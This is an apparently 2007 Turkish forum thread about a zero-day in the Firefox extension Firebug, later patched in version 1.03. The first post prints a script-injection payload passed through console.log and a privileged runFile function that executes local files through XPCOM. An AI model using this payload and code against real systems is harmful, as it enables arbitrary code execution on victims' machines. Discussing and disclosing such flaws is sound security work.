ir2
Kayıt : 10 Mayis 2003
|
|
cnaımız ciğerimiz firefox'un can yoldaşı javascript yazarlarının biricik sevgilisi firebug firefox'un file objesine direkt erişime sahip olduğundna hertürlü ipneliği çalıştırma yetkisine olanak veriyo.
Console.log komutuyla normalde konsola debug ederiz bişeyler ama şu şekilde log edince; console.log({'<script>alert("tahribat.kon")</script>':'exploit'})
script çalışıyo hemde en kötüsü firefoxun web sitesine verdiği yetki değil firefoxun eklentiye verdiği yetki üzerindne çalışıyo.. nelermi yapılaiblir? herşey! örneğin geçenlerde çıkan şu file execute olayı hemen çözülmüştü ama firebug bunu halen çalıştıracak yetkiye sahip... firefox için runfile komutu; function runFile(f) {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile); file.initWithPath(f); var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess); process.init(file); var argv = Array.prototype.slice.call(arguments, 1); process.run(true, argv, argv.length);
}
ne yapmalı? çözümü bulunana kadar firebug kullanmamalı.
daha fazla ayrıntı; http://www.gnucitizen.org/blog/firebug-goes-evil
[ msn: ir2@ir2.org ]
|
|
|
nasıl kaldırılıo bu firebug?
|
amele_2
(Sinek)
Kayıt : 1 Eylül 2005
|
|
yazdığın kodları benim gibi programlama bilmeyen dallamalar için bi açıklayabilirmisin?function runFile(f) {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile); ne diyo bu amk :S
Ardından yüz köpek havlamayan kurt, kurt sayılmaz..
http://hsyn.biz [blog(bildiğin wp emmeli gömmeli)] [PC, Notebook, Cep Telefonu tamiri yapılır, cep telefonu ve bilgisayar yedek parça, aksesuar satışı yapılır. iZ Elektronik - Çankaya/İZMİR ]
http://ask.fm/asosyalsinek <Sorun lan çekinmeyin>
|
ir2
Kayıt : 10 Mayis 2003
|
|
firebug bi eklentidir bütün firefox sürümlerinde olan bişey dğeil yani. ama js programcılaırnın, xhtml kodlayanların çoğu kullanır. www.getfirebug.com adresindne çekilir kaldırmak içinde eklentilerden kaldırı seçicen sadece.
[ msn: ir2@ir2.org ]
|
|
|
gecen burdan birisi linkini vermisti indirmistim ne şanssız adamım daha yararlanamadan acık cıktı
|
a4tech
Kayıt : 21 Temmuz 2005
OpenSource
|
|
CVE Referansı yok mu? Planet Security[1]'e haber düşmedi.. http://planetsecurity.bacarospo.net/ Açığın doğrulandığına dair herhangi bir haber yok, beklemeyi ve kullanmamayı tercih ediyorum :)
|
a4tech
Kayıt : 21 Temmuz 2005
OpenSource
|
|
Her neyse, açık kapatıldı; About an hour ago I received word of a 0-day security exploit that has been discovered and reported. I have just released a new Firebug (version 1.03) with a fix for this bug, and I recommend that everyone install it as soon as possible. http://www.getfirebug.com/blog/2007/04/04/security-update/
|
amele_2
(Sinek)
Kayıt : 1 Eylül 2005
|
|
çıktığı gün kapandı ha : ) gözünü sevdiğimin opın sörcü
Ardından yüz köpek havlamayan kurt, kurt sayılmaz..
http://hsyn.biz [blog(bildiğin wp emmeli gömmeli)] [PC, Notebook, Cep Telefonu tamiri yapılır, cep telefonu ve bilgisayar yedek parça, aksesuar satışı yapılır. iZ Elektronik - Çankaya/İZMİR ]
http://ask.fm/asosyalsinek <Sorun lan çekinmeyin>
|
|
|
Onemli olan ciktigi gun kapatilmasi degilki :) acik duyuruldugu andan itibaren bitmis demektir.Kim bilir ne canlar yandi bu aciktan :)
Hep denedin. Hep yenildin. Olsun yine dene , yine yenil ama daha iyi yenil !
|
|
|
firefox operanın züküne kurban olsun. en temizi opera
Çocuklugundan beri "Sen herkez değilsin" denilerek yetiştirilmiş biri olarak , sıradanlık erdem dir sözüne inanan sıradanlaşma çabası gösteren ; fakat herkesin farklılaşma çabasına rağmen sıradanlaşma fikrinin en büyük farklılık oldugunu farkeden bir garip canlıdır bu imzanın sahibi...
herkez den tek farkım bu fark hariç başka bi farkımın olmadıgını düşünmektir.
yarın doğum günüm :)
|
a4tech
Kayıt : 21 Temmuz 2005
OpenSource
|
|
ComputerWolf bunu yazdı:
-----------------------------
Onemli olan ciktigi gun kapatilmasi degilki :) acik duyuruldugu andan itibaren bitmis demektir.Kim bilir ne canlar yandi bu aciktan :)
----------------------------- Evet, microsoft ie'deki açıklarını en erken 4 ayda kapatıyor. Kim bilir ne canlar yanmıştır :)
|
|
Giriş Yap
Kayıt ol
Online Üyeler
Aktif Konular
Arama
Üyeler
Forum Kuralları
Tahribat.Com Forumları
Firebug"da Büyük Açık Ke$fedildi :| [4nisan]
Kısayol
Alıntı yap
Özel Mesaj
![Google'da Ara : Firebug"da büyük açık ke$fedildi :| [4nisan]](/img/SocialBookmark/google2.png){kind=small}
